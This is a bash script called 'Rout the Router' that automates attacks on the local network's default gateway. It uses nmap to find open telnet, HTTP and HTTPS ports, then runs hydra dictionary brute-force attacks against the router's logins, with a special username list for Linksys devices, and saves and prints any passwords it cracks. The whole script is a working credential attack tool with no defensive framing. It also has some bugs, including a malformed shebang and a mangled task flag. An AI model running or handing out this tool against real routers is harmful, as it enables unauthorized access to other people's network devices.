Untitled

#/bin/bash
    version="0.1"
  passwords=/root/passwords.lst           # Where to store found passwords
   username=/root/Hydra/user.lst          # User list path
   dictpath=/root/Hydra/pass.lst          # Password list path
      tasks=15                            # Hydra tasks
    logfile=/tmp/hydra/logfile.lst        # Will be adding to this for verbosity
scanresults=/tmp/hydra/scanresults.lst    # Temp nmap scan output
       temp=/tmp/hydra                    # Temp folder

#-- Nothing to change below this line ---------------------------------------------------------------

#__ Check if Root __________________________________________________________
if [ "$(id -u)" != "0" ] ; then echo "You must be root to use Rout the Router" ; exit 1 ; fi

#-- Checking if programs are installed --------------------------------------------------------------
if [ ! -e "/usr/bin/nmap" ] ; then
   echo "Nmap is not installed."
   read -p ">> Would you like to try and install it? [Y/n]: " -n 1
   if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install nmap ; fi
   if [ ! -e "/usr/share/nmap/nmap-services" ] ; then
      echo "Failed to install Nmap"
   else
      display info "Installed: Nmap"
   fi
fi
if [ ! -e "/usr/bin/hydra" ] ; then
   echo "Hydra is not installed."
   read -p ">> Would you like to try and install it? [Y/n]: " -n 1
   if [[ "$REPLY" =~ ^[Yy]$ ]] ; then apt-get -y install hydra ; fi
   if [ ! -e "/usr/bin/hydra" ] ; then
      echo "Failed to install Hydra"
   else
      display info "Installed: Hydra"
   fi
fi
echo "Nmap and Hydra are installed"

#-- Verifying ---------------------------------------------------------------------------------------
if [ ! -e "$username" ] ; then
echo "Username path not specified" ;
exit 1
fi
if [ ! -e "$dictpath" ] ; then
echo "Dictionary path not specified" ;
exit 1
fi
if [ ! -d $temp ] ; then mkdir /tmp/hydra/ 2>/dev/null ; fi

IP=$(ip route | grep default | awk '{ print $3}')            # Gives us The Gateway IP address
http=""
https=""
echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
echo "Finding Alive Hosts and Scanning them"
echo "<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>"
nmap -p 23,80,443 -oG $temp/scanresults.lst $IP | grep "MAC" >> $temp/routerinfo.lst  # Nmap scan
http=$(grep '80/open' $scanresults | awk '{ print $2}')
if [ "$http" == "$IP" ] ; then http="true" ; fi
https=$(grep '443/open' $scanresults | awk '{ print $2}')
if [ "$https" == "$IP" ] && [ "$http" != "true" ] ; then https="true" ; fi # We don't want to attack 443 if we can get 80
telnet=$(grep '23/open' $scanresults | awk '{ print $2}')
if [ "$telnet" == "$IP" ] ; then telnet="true" ; fi
# -- Brand customization -----------------------------------------------------------------
brand=$(awk '{ print $4 }' $temp/routerinfo.lst)
if [ $brand == "(Cisco-Linksys)" ] ; then
   echo "admin
user" > $temp/linksys.lst
   username="$temp/linksys.lst"
fi

if [ $http == "true" ] ; then
   echo "<<<<<<<<<>>>>>>>>>>>"
   echo "Attacking on Port 80"
   echo "<<<<<<<<<>>>>>>>>>>>"
   hydra -L $username -P $dictpath -e n -e s -t  n$tasks -f -w 15 -v $IP http-get / -o $temp/http.lst
   cat $temp/http.lst | grep "passwords:" >> $passwords
   pass=$(grep "password:" $passwords | awk '{ print $4}') >/dev/null
   if [ "$pass" == "" ] ; then https="true" ; fi
fi
if [ $https == "true" ] ; then
   echo "<<<<<<<<<<>>>>>>>>>>>"
   echo "Attacking on Port 443"
   echo "<<<<<<<<<<>>>>>>>>>>>"
   hydra -L $username -P $dictpath -S -e n -e s -t $tasks -f -w 15 -v $IP https-get / -o $temp/https.lst
   cat $temp/https.lst | grep "passwords:" >> $passwords
fi
if [ "$telnet" == "true" ] ; then
   echo "<<<<<<<<<<>>>>>>>>>>"
   echo "Attacking on Port 23"
   echo "<<<<<<<<<<>>>>>>>>>>"
   hydra -L $username -P $dictpath -e n -e s -t $tasks -f -w 15 -v $IP telnet / -o $temp/telnet.lst
   cat $temp/telnet.lst | grep "passwords:" >> $passwords
fi
# Cleanup
clear
echo date >> $passwords
cat $passwords
rm -rf /$temp/routerinfo.lst
rm -rf $scanresults
rm -rf $temp/http.lst
rm -rf $temp/https.lst
rm -rf $passwords       # Remove this for release version
exit 0